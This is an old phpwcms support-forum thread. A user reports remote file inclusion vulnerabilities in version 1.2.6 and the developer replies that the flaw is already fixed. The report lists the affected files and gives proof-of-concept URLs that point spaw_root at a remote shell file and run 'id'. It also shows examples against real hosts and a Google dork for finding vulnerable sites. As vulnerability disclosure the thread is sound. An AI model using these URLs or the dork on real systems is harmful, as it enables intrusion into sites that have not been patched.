CRITICAL SECURITY BUG!!!!!

Use GitHub to post bug reports and error descriptions for phpwcms. Describe your problem detailed!
Locked
kingless
Posts: 6
Joined: Sat 15. Jul 2006, 06:28
Location: Portugal

CRITICAL SECURITY BUG!!!!!

Post by kingless »

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw ... ttp://ehmo
rgan.net/shell.dat?

Example:
http://132.195.14.67/phpwcms/include/in ... paw_root=h
ttp://ehmorgan.net/shell.dat?

Example working:
http://www.acvz.com/phpwcms/include/inc ... xt?&cmd=id

Google Dork:

inurl:"phpwcms/index.php?id="

This One was hacked today by some hackers > http://www.saalburg-ebersdorf.de/phpwcm ... 10,0,0,1,0

Fix it Quickliy ;)
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
User avatar
flip-flop
Moderator
Posts: 8178
Joined: Sat 21. May 2005, 21:25
Location: HAMM (Germany)
Contact:

Post by flip-flop »

I have called the webmaster saalburg-ev..... via e-Mail, but no answer.
His site is up, and I hope updated. ........

Schulterzuck.

Knut
>> HowTo | DOCU | FAQ | TEMPLATES/DOCS << ( SITE )
kingless
Posts: 6
Joined: Sat 15. Jul 2006, 06:28
Location: Portugal

Post by kingless »

Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver
yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible. :wink:
Pappnase

Post by Pappnase »

kingless wrote:
Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver
yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible. :wink:
hello

all get an mail! in the forum was a big thread, at the projectsite there was also infos about that and last also at the docu page!
Locked